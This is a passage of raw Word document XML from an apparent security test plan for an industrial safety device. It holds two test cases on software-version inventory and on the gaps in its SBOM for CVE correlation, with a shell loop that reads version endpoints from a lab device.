            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F8AC774" w14:textId="76B1B5D5" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="00F5170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SVV-1 (Requirement-based Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00FD6890" w14:paraId="626500C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669622" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E9A5969" w14:textId="513D36EC" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="0070537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0537A">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enumerate the complete set of installed-software identifiers and confirm coverage of the software necessary for safe operation: host firmware, both bootloaders, SCPU firmware, and the PROFIsafe stack. Compile the actual inventory as the CR 7.8 baseline.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="572DDD8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7DC1195" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B68FE71" w14:textId="77777777" w:rsidR="006D1BCB" w:rsidRDefault="006D1BC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1BCB">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Read all /deviceinfo/swinfo/* and /deviceinfo/swrevision. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6958CD02" w14:textId="77777777" w:rsidR="006D1BCB" w:rsidRDefault="006D1BC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1BCB">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Read I&amp;M0 SOFTWARE_REVISION and I&amp;M5 annotation. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="216D6C7D" w14:textId="77777777" w:rsidR="006D1BCB" w:rsidRDefault="006D1BC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1BCB">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Read /firmware/version and /fieldbussetup/fieldbusfirmware. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="309B76EB" w14:textId="0EBDC64F" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="006D1BC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1BCB">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Assemble the inventory; map each entry to the safety function it supports.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00316EA1" w14:paraId="141D27C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985AD0" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78BC9B52" w14:textId="77777777" w:rsidR="00295B5E" w:rsidRDefault="00295B5E"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295B5E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS (partial-conformance baseline) iff host FW, both bootloaders, SCPU FW, and the PROFIsafe-stack version are all retrievable and internally consistent (I&amp;M0/I&amp;M5 agree with /deviceinfo/*). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E09E14" w14:textId="619A5505" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="00295B5E"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295B5E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Documented shortfall where any safety-relevant installed component is not individually identified (feeds SBOM gap G-1).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D8CC8B4" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00AF57B2" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFC6413"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41E5ED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982011" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C130CFC"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5E36114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C5B1D9" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37449C89" w14:textId="2ABF4E4E" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="00186C5B" w:rsidP="00186C5B">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2255"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00186C5B">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ006-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00F15AEA" w14:paraId="110CB99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1C501" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="052FAD01" w14:textId="6E53D609" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="00AC53E8" w:rsidP="00AC53E8">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1236"/>
              </w:tabs>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AC53E8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DUT 192.168.0.2; Pi mgmt eth1 = 192.168.50.10; browser 192.168.50.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="3B2DE40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386824" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EFFECD7" w14:textId="345E82A3" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="00666ECA" w:rsidP="00666ECA">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1195"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00666ECA">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl / IoT-Core visualizer; PROFINET acyclic read for I&amp;M0/I&amp;M5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00FD6890" w14:paraId="06EA90E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A928895" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E3765DA"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 TC-RQ006-01 Installed-software inventory enumeration (software-only; no data fingerprint)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4B4EEA"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for ep in deviceinfo/swrevision &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A1F1E01"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deviceinfo/swinfo/cpubootloaderversion &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16CEF2A5"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deviceinfo/swinfo/scpuversion &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C3F552C"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deviceinfo/swinfo/scpubootloaderversion &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B3396C"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firmware/version firmware/type &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AAEC62B"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fieldbussetup/fieldbusfirmware ; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DF5229C"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echo "== $ep =="; curl -s "http://192.168.0.2/$ep";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="103D7CFD"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done | tee TC0601_swinv.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="128EAF5F" w14:textId="21F09FDF" w:rsidR="00B73A1A" w:rsidRPr="00254A92"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 I&amp;M0 SOFTWARE_REVISION + I&amp;M5 annotation via acyclic PN read -&gt; append to inventory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="6710B85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FC69D86" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31961E2F" w14:textId="1ECBE340" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="007F76DE"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F76DE">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Host FW, CPU bootloader, SCPU FW, SCPU bootloader, PROFIsafe stack ("3.3.0.12"), I&amp;M0/I&amp;M5 all returned and mutually consistent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="7CF84FE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77C64C2" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A320BB7" w14:textId="7DEBD3AE" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="007F76DE"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All safety relevant SW identified/Consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="08CFB2A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1D7A39" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EE6D6EA" w14:textId="2E5836DE" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="00111E5F"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111E5F">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">TC0601_swinv.txt, I&amp;M0/I&amp;M5 read log, inventory→safety-function </w:t>
            </w:r>
            <w:r w:rsidRPr="00111E5F">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>mapping table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70AB0906" w14:textId="77777777" w:rsidR="008E13FA" w:rsidRDefault="008E13FA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="503E18B5" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F58C9F" w14:textId="030BE96D" w:rsidR="00254A92" w:rsidRDefault="006570B1" w:rsidP="00254A92">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ006-02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00015538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SBOM Completeness &amp; Third-Party CVE-Correlation Gap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4120639D" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00254A92">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254A92" w14:paraId="211B64C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9A4C30" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44699239" w14:textId="77777777" w:rsidR="00254A92"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254A92" w14:paraId="6AB709F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2F71358" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BADEF02" w14:textId="556BAD36" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="007A247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A2476">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ006-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="00EE7A74" w14:paraId="2F84FFD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B068507" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="142A22C8" w14:textId="1C8861E4" w:rsidR="00254A92" w:rsidRPr="006868A2" w:rsidRDefault="00B95225"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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ-006 → CR 7.8 (SBOM limb) / 4-1 SM-9-SM-10 → Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="00D67CA6" w14:paraId="418C993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57A2E4" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6910B8C0" w14:textId="2148E9CC" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="00216A1A"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Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w14:paraId="49A7349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9DF5376" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1791A658" w14:textId="329B190E" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="00216A1A"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SVV-3 (Vulnerability Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="00EE7A74" w14:paraId="088D6B5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996EA8" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F36E8CA" w14:textId="47307475" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="00022C2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22C23">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that the exposed inventory is top-level only and provides no SBOM of the safety-critical third-party components (RTOS, PROFIsafe stack, STM self-test library, netX90 stack), so their versions cannot be enumerated or CVE-correlated</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00022C23">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 7.8 met at product granularity but not at component granularity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="00EE7A74" w14:paraId="6EF502DD"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45BE044" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76654505" w14:textId="77777777" w:rsidR="003C17A8" w:rsidRDefault="003C17A8"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17A8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. From TC-RQ006-01, list all device-exposed version strings. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CB5ED5D" w14:textId="77777777" w:rsidR="003C17A8" w:rsidRDefault="003C17A8"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17A8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. From documentation, list the known constituent third-party components. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27BD3162" w14:textId="77777777" w:rsidR="003C17A8" w:rsidRDefault="003C17A8"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17A8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Attempt to derive each component's version from any exposed interface. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43B76D9D" w14:textId="5A5FC95F" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="003C17A8"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17A8">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. For derivable versions, query a vulnerability database (off-lab); record the rest as un-inventoried.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254A92" w:rsidRPr="00EE7A74" w14:paraId="6398750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7BC887" w14:textId="77777777" w:rsidR="00254A92" w:rsidRDefault="00254A92" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FC8C0C7" w14:textId="3A8F4F80" w:rsidR="00254A92" w:rsidRPr="00254A92" w:rsidRDefault="00D072CE"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D072CE">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
